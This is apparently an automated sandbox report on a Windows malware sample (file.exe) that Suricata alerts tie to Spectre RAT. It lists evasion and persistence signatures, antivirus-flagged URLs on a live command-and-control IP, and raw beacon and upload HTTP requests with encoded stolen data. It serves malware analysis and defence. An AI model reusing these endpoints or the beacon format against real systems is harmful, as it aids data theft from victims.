Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561834
MD5: c938c02a19091a3acd044001631692c8
SHA1: 681e661b16ae2bebce2ef18facb86de6fd727cae
SHA256: e090769b89bee3e8ab4a316355fab8da61f629b0eee9da37c0ac312bdc20aad8
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh. Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=5 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?gi Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=8 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6h Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=60% Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6T Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6Q Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=31 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true Avira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyh Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7wk0 Avira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyh.php?jspo=6 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=2 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.% Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=6 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6c Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.c Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.# Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, nircmdc.exe.52.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 52_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004107A0 FindFirstFileA, 52_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_004062D5 FindFirstFileW,FindClose, 88_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00402E18 FindFirstFileW, 88_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 88_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032\ Jump to behavior

Networking

Source: Network traffic Suricata IDS: 2853767 - Severity 1 - ETPRO MALWARE Win32/Spectre RAT CnC Activity M1 : 192.168.2.5:49864 -> 178.215.224.74:80
Source: Network traffic Suricata IDS: 2853768 - Severity 1 - ETPRO MALWARE Win32/SpectreRAT CnC Activity M2 : 192.168.2.5:49864 -> 178.215.224.74:80
Source: Joe Sandbox View IP Address: 178.215.224.252
Source: Joe Sandbox View ASN Name: LVLT-10753US
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 639
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 46 75 62 6d 64 73 63 56 78 44 63 48 42 45 59 58 52 68 58 6c 70 74 59 57 31 70 62 47 56 63 52 47 31 73 63 47 68 72 62 6b 78 31 62 33 4a 7a 58 44 41 35 4d 44 49 79 52 54 41 79 4c 7a 42 44 4d 44 49 6c 4e 6a 55 78 4f 79 38 30 4f 30 49 37 57 55 4a 66 4d 7a 49 77 4b 44 6b 34 4d 6a 73 7a 4b 48 64 70 62 6d 52 76 64 33 45 6f 5a 6d 56 6d 5a 57 78 6d 5a 58 4a 5a 51 46 30 78 4d 6a 41 69 4d 54 49 79 4d 54 41 6f 4d 54 55 36 4c 44 49 7a 4e 79 77 79 4d 6a 51 73 4f 6a 63 79 57 30 68 66 4d 7a 67 77 4b 44 4d 79 4d 6a 4d 77 4b 6a 4d 25 32 46 4d 43 77 77 4d 54 63 75 4d 6a 49 30 4c 6a 63 32 55 30 4a 64 4d 54 41 79 4b 44 45 77 4d 6a 45 78 4b 6a 4d 33 4d 43 34 77 4d 7a 55 75 4d 44 49 32 4c 44 55 30 57 55 4a 66 4d 69 6f 79 4d 6a 30 6f 51 7a 70 55 56 33 46 74 63 6e 46 65 59 32 35 6b 62 57 35 78 56 45 6c 79 63 6b 52 6a 64 47 46 63 55 6d 39 68 62 32 46 73 5a 31 78 45 62 57 35 77 61 47 74 75 52 48 56 76 63 48 74 63 59 33 68 32 64 79 78 6c 65 6d 64 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 45 71 4f 54 55 36 4a 6a 49 7a 4e 79 77 77 4d 44 59 75 4e 54 78 54 51 6c 38 79 4b 44 49 77 4e 53 70 44 4f 6c 35 64 63 57 56 79 63 31 35 6a 62 47 5a 74 62 6e 4e 63 51 33 42 34 52 47 4e 32 59 56 78 51 62 32 4e 76 61 32 35 6c 58 6b 5a 76 62 48 42 71 59 57 78 45 64 57 56 79 63 56 52 34 61 6e 56 7a 4c 48 68 72 63 46 6c 49 56 54 4d 79 4d 43 67 78 4d 44 45 79 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 68 62 6d 5a 76 62 6e 46 63 53 58 42 79 52 6d 46 30 59 31 78 51 62 57 4e 74 61 32 78 6c 58 45 52 76 62 6e 68 71 61 57 35 4d 64 32 39 34 63 31 35 36 61 6e 56 7a 4c 48 70 72 65 46 4e 43 58 7a 45 79 4d 43 6f 78 4d 44 41 78 4d 79 49 7a 4e 7a 67 75 4d 44 4d 31 4c 6a 41 79 4e 43 34 31 4e 46 4e 41 58 77 25 33 44 25 33 44
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmFubmdscVxDcHBEYXRhXlptYW1pbGVcRG1scGhrbkx1b3JzXDA5MDIyRTAyLzBDMDIlNjUxOy80O0I7WUJfMzIwKDk4MjszKHdpbmRvd3EoZmVmZWxmZXJZQF0xMjAiMTIyMTAoMTU6LDIzNywyMjQsOjcyW0hfMzgwKDMyMjMwKjM%2FMCwwMTcuMjI0Ljc2U0JdMTAyKDEwMjExKjM3MC4wMzUuMDI2LDU0WUJfMioyMj0oQzpUV3FtcnFeY25kbW5xVElyckRjdGFcUm9hb2FsZ1xEbW5waGtuRHVvcHtcY3h2dyxlemdZQF8zMjAqMTI4MzEqOTU6JjIzNywwMDYuNTxTQl8yKDIwNSpDOl5dcWVyc15jbGZtbnNcQ3B4RGN2YVxQb2Nva25lXkZvbHBqYWxEdWVycVR4anVzLHhrcFlIVTMyMCgxMDEyMypBMl5Vc2VwcVxhbmZvbnFcSXByRmF0Y1xQbWNta2xlXERvbnhqaW5Md294c156anVzLHpreFNCXzEyMCoxMDAxMyIzNzguMDM1LjAyNC41NFNAXw%3D%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 247
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 59 57 52 6d 62 57 78 7a 58 45 4e 77 63 6b 5a 6a 64 47 4e 65 54 6d 39 6a 59 57 35 55 56 6d 56 74 65 46 34 31 50 6a 67 79 4d 54 42 65 52 47 74 75 61 33 74 67 4c 47 46 76 62 31 74 41 58 55 4d 36 58 46 64 37 5a 33 4a 7a 58 47 4e 75 5a 6d 39 73 63 31 78 42 63 6e 42 4d 59 58 5a 6a 58 45 78 74 59 32 4e 75 58 6c 52 6e 62 33 4a 63 4e 7a 59 36 4f 44 45 79 58 45 35 72 62 47 46 7a 61 69 78 68 62 57 38 25 33 44
    Data Ascii: jspo=43&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeYWRmbWxzXENwckZjdGNeTm9jYW5UVmVteF41PjgyMTBeRGtua3tgLGFvb1tAXUM6XFd7Z3JzXGNuZm9sc1xBcnBMYXZjXExtY2NuXlRnb3JcNzY6ODEyXE5rbGFzaixhbW8%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 521
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 46 73 5a 47 39 6d 63 31 35 44 63 48 42 47 59 58 5a 6a 58 6b 78 74 59 57 4e 73 58 48 52 6e 5a 58 4a 63 55 6d 31 30 5a 32 5a 31 5a 30 5a 6e 64 47 74 68 5a 58 45 6d 62 58 70 6e 57 30 4a 64 4f 43 6f 78 4d 44 4d 6f 53 7a 68 63 56 58 4e 6e 63 48 4e 63 59 32 78 6d 62 32 78 7a 56 45 46 79 63 6b 52 68 64 6d 46 65 54 6d 31 6a 59 32 35 65 64 47 56 74 63 6c 52 51 5a 58 5a 74 62 48 64 74 52 47 64 30 61 32 46 6e 63 53 35 6e 63 47 31 5a 51 6c 30 7a 4d 44 41 71 4e 69 70 62 51 6c 55 7a 4d 44 41 71 4d 7a 49 77 4d 54 4d 71 4d 54 63 36 4c 6a 6f 78 4e 79 77 79 4d 6a 59 75 4e 54 5a 5a 51 46 38 7a 4d 6a 41 71 4d 54 49 34 4d 7a 4d 71 4f 54 64 5a 53 46 30 7a 4d 6a 49 6f 4d 7a 49 77 4d 7a 6b 69 4d 7a 55 34 4c 44 49 78 4e 53 34 79 4d 6a 59 6d 4e 54 52 62 51 46 38 7a 4d 44 4d 6f 4d 54 41 79 4d 6a 49 69 55 6d 64 30 5a 57 35 33 5a 55 5a 6e 64 47 6c 68 5a 33 45 75 5a 58 68 6e 55 30 4a 64 4d 54 67 79 4b 44 6b 77 4d 6a 4d 7a 4b 44 4d 31 4f 43 77 36 4f 54 63 73 4d 6a 41 30 4c 6a 63 30 57 30 42 66
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGFsZG9mc15DcHBGYXZjXkxtYWNsXHRnZXJcUm10Z2Z1Z0ZndGthZXEmbXpnW0JdOCoxMDMoSzhcVXNncHNcY2xmb2xzVEFyckRhdmFeTm1jY25edGVtclRQZXZtbHdtRGd0a2FncS5ncG1ZQl0zMDAqNipbQlUzMDAqMzIwMTMqMTc6LjoxNywyMjYuNTZZQF8zMjAqMTI4MzMqOTdZSF0zMjIoMzIwMzkiMzU4LDIxNS4yMjYmNTRbQF8zMDMoMTAyMjIiUmd0ZW53ZUZndGlhZ3EuZXhnU0JdMTgyKDkwMjMzKDM1OCw6OTcsMjA0Ljc0W0Bf
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 434
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 39 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 59 57 78 6d 62 57 5a 78 57 30 42 56 54 56 45 6f 54 6d 4e 76 5a 7a 67 69 49 69 41 69 4b 43 67 69 49 69 41 69 49 43 41 67 49 43 41 67 49 69 67 69 54 57 6c 6a 63 47 31 7a 62 32 52 30 49 46 64 72 62 6d 78 76 64 58 45 67 4d 54 49 67 55 6e 42 74 57 30 4a 66 4d 7a 41 75 4d 44 4d 25 32 46 4d 6a 41 77 55 30 4a 66 4f 44 59 30 4e 44 63 30 57 55 4a 64 51 54 4a 55 56 33 46 6c 63 48 4e 63 59 57 78 6d 62 32 78 37 58 6b 46 77 63 45 5a 6a 64 47 46 65 54 47 39 6a 59 32 78 55 56 47 64 76 63 46 77 31 4e 6a 6f 79 4d 54 4a 65 52 47 74 75 61 58 4e 71 4a 6d 46 76 62 56 4e 43 58 30 73 36 58 6c 64 78 5a 33 42 78 58 47 4e 6b 62 6d 31 73 63 31 35 42 63 48 42 45 59 58 52 6a 56 45 35 76 59 32 46 75 58 6c 52 6c 62 33 42 63 4e 7a 51 34 4f 44 4d 77 58 6b 5a 70 62 47 6c 78 61 69 78 6a 62 57 39 5a 51 46 30 78 4d 69 55 77 4e 6c 74 49 58 30 46 4d 57 30 4a 66 64 6e 42 33 5a 31 74 43 56 57 35 6a 62 6e 4e 6e 57 30 42 64 4f 43 34 30 4e 43 59 7a 4d 6a 4d 75 4e 54 64 62 51 46 39 62 51 46 31 42 4f 6c 52 56 63 57 64 79 63 31 35 68 62 6d 52 74 62 6e 46 65 51 33 42 77 52 47 4e 38 59 31 78 53 5a 32 4e 76 59 57 35 6c 58 6b 5a 74 62 6e 4a 6f 61 32 5a 4d 64 32 39 77 63 51 25 33 44 25 33 44
    Data Ascii: jspo=9&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=YWxmbWZxW0BVTVEoTmNvZzgiIiAiKCgiIiAiICAgICAgIigiTWljcG1zb2R0IFdrbmxvdXEgMTIgUnBtW0JfMzAuMDM%2FMjAwU0JfODY0NDc0WUJdQTJUV3FlcHNcYWxmb2x7XkFwcEZjdGFeTG9jY2xUVGdvcFw1NjoyMTJeRGtuaXNqJmFvbVNCX0s6XldxZ3BxXGNkbm1sc15BcHBEYXRjVE5vY2FuXlRlb3BcNzQ4ODMwXkZpbGlxaixjbW9ZQF0xMiUwNltIX0FMW0JfdnB3Z1tCVW5jbnNnW0BdOC40NCYzMjMuNTdbQF9bQF1BOlRVcWdyc15hbmRtbnFeQ3BwRGN8Y1xSZ2NvYW5lXkZtbnJoa2ZMd29wcQ%3D%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 331
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 4e 6b 5a 47 39 75 63 31 35 44 63 48 42 47 59 58 52 68 58 6c 4a 6e 59 57 39 72 62 6d 64 65 52 47 31 75 63 6d 68 72 62 45 5a 31 62 58 42 78 56 48 4e 35 64 58 67 73 65 47 46 77 57 55 4a 66 4d 7a 49 79 4b 6a 4d 34 4f 54 41 78 4b 6b 45 36 58 46 56 7a 5a 58 4a 78 56 47 4e 73 5a 6d 39 73 63 56 78 42 63 6e 42 45 59 58 5a 68 56 46 4a 74 59 32 31 70 62 47 64 65 52 6d 31 73 63 6d 70 72 62 6b 52 31 62 33 68 78 58 48 46 78 64 33 49 6d 65 6d 74 79 57 55 4a 66
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGNkZG9uc15DcHBGYXRhXlJnYW9rbmdeRG1ucmhrbEZ1bXBxVHN5dXgseGFwWUJfMzIyKjM4OTAxKkE6XFVzZXJxVGNsZm9scVxBcnBEYXZhVFJtY21pbGdeRm1scmprbkR1b3hxXHFxd3ImemtyWUJf
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 833
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 1701
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 131
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 39 76 65 6d 74 73 62 47 46 65 52 6d 46 79 5a 32 52 76 65 46 35 62 51 6c 38 25 33 44
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkzMCpLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXk9vemtsbGFeRmFyZ2RveF5bQl8%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php?uvyw=6 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----974767299852498929531610575
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 29950
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php?uvyw=2 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----974767299852498929531610575
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 699317
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 367
    Cache-Control: no-cache
